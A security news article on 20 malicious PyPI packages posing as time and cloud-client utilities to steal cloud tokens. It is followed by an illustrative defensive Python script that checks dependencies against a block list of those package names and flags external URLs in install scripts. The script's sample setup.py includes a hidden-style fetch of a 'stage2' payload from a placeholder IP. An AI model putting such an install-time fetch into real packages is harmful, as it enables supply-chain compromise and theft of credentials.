Cybersecurity researchers have warned of a malicious campaign targeting the Python Package Index (PyPI) repository with bogus libraries masquerading as "time" related utilities, but carrying hidden functionality to steal sensitive data such as cloud access tokens.
Software supply chain security firm ReversingLabs said it discovered two sets of packages totaling 20. The packages have been cumulatively downloaded more than 14,100 times:
- snapshot-photo (2,448 downloads)
- time-check-server (316 downloads)
- time-check-server-get (178 downloads)
- time-server-analysis (144 downloads)
- time-server-analyzer (74 downloads)
- time-server-test (155 downloads)
- time-service-checker (151 downloads)
- aclient-sdk (120 downloads)
- acloud-client (5,496 downloads)
- acloud-clients (198 downloads)
- acloud-client-uses (294 downloads)
- alicloud-client (622 downloads)
- alicloud-client-sdk (206 downloads)
- amzclients-sdk (100 downloads)
- awscloud-clients-core (206 downloads)
- credential-python-sdk (1,155 downloads)
- enumer-iam (1,254 downloads)
- tclients-sdk (173 downloads)
- tcloud-python-sdks (98 downloads)
- tcloud-python-test (793 downloads)
While the first set consists of packages used to upload stolen data to the threat actor's infrastructure, the second cluster consists of packages implementing cloud client functionality for several services such as Alibaba Cloud, Amazon Web Services and Tencent Cloud.
But the second cluster also uses the "time" related packages to exfiltrate cloud secrets. All the identified packages had already been removed from PyPI as of writing.
Further analysis has revealed that three of the packages, acloud-client, enumer-iam and tcloud-python-test, have been listed as dependencies of a relatively popular GitHub project named accesskey_tools, which has been forked 42 times and starred 519 times.
tcloud-python-test was referenced in a source code commit on November 8, 2023, indicating that the package has been available for download on PyPI since at least then. The package has been downloaded 793 times, per data from pepy.tech.
The disclosure comes as Fortinet FortiGuard Labs said it discovered thousands of packages across PyPI and npm, some of which have been found to embed suspicious install scripts designed to deploy malicious code during installation or to communicate with external servers.
"Suspicious URLs are a major indicator of potentially malicious packages, as they are often used to download additional payloads or to establish communication with command-and-control (C&C) servers, which give attackers control over the infected systems," Jenna Wang said.
"In 974 packages, such URLs are associated with exfiltration, further malware downloads and other malicious tasks. To prevent exploitation, it is important to examine and monitor external URLs in package dependencies."
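Two defender-side checks that follow from the points above (the named packages turning up as dependencies, and external URLs in install scripts), as an added example in Python that is not ReversingLabs' or Fortinet's tooling; the package subset, the allow-listed hosts and the sample inputs are constructed for illustration.

```python
import re
# Subset of the removed package names listed in the article (spelling normalized).
REMOVED_PACKAGES = {
    "acloud-client", "enumer-iam", "tcloud-python-test",
    "time-check-server", "time-server-analysis", "credential-python-sdk",
}

def normalize(name):
    """PEP 503 normalization: runs of '-', '_' and '.' become '-', then lowercase."""
    return re.sub(r"[-_.]+", "-", name).lower()

def parse_requirement_name(line):
    """Project name from a requirements.txt line; None for blanks, comments and options."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None
    m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)", line)
    return m.group(1) if m else None

def flag_removed_requirements(requirements_text):
    """Normalized names of requirements that match a known removed package."""
    hits = []
    for line in requirements_text.splitlines():
        name = parse_requirement_name(line)
        if name and normalize(name) in REMOVED_PACKAGES:
            hits.append(normalize(name))
    return hits

URL_RE = re.compile(r"https?://[^\s'\"()<>,;]+")
def external_urls(source, allowed_hosts=("pypi.org", "files.pythonhosted.org")):
    """URLs in an install script whose host is not on the allow-list (deduplicated)."""
    found = []
    for url in URL_RE.findall(source):
        host = url.split("://", 1)[1].split("/", 1)[0].split(":")[0].lower()
        if host not in allowed_hosts and url not in found:
            found.append(url)
    return found

# Constructed sample inputs: a requirements file and a setup.py with a hard-coded fetch.
SAMPLE_REQUIREMENTS = "requests>=2.31\nACloud_Client==0.1.2  # -> acloud-client\nEnumer.IAM\ntime-server-analysis\n-r other.txt\n"
SAMPLE_SETUP_PY = (
    'from setuptools import setup\nimport urllib.request\n'
    'INDEX = "https://pypi.org/simple/"\n'
    'urllib.request.urlopen("http://203.0.113.10:8080/stage2")  # documentation-range IP\n'
    'setup(name="time-check-server", install_requires=["requests"])\n'
)

if __name__ == "__main__":
    print(flag_removed_requirements(SAMPLE_REQUIREMENTS), external_urls(SAMPLE_SETUP_PY))
```

Run against a real lockfile and an unpacked sdist, the same two functions turn the article's indicators into a pre-install review step rather than an after-the-fact cleanup.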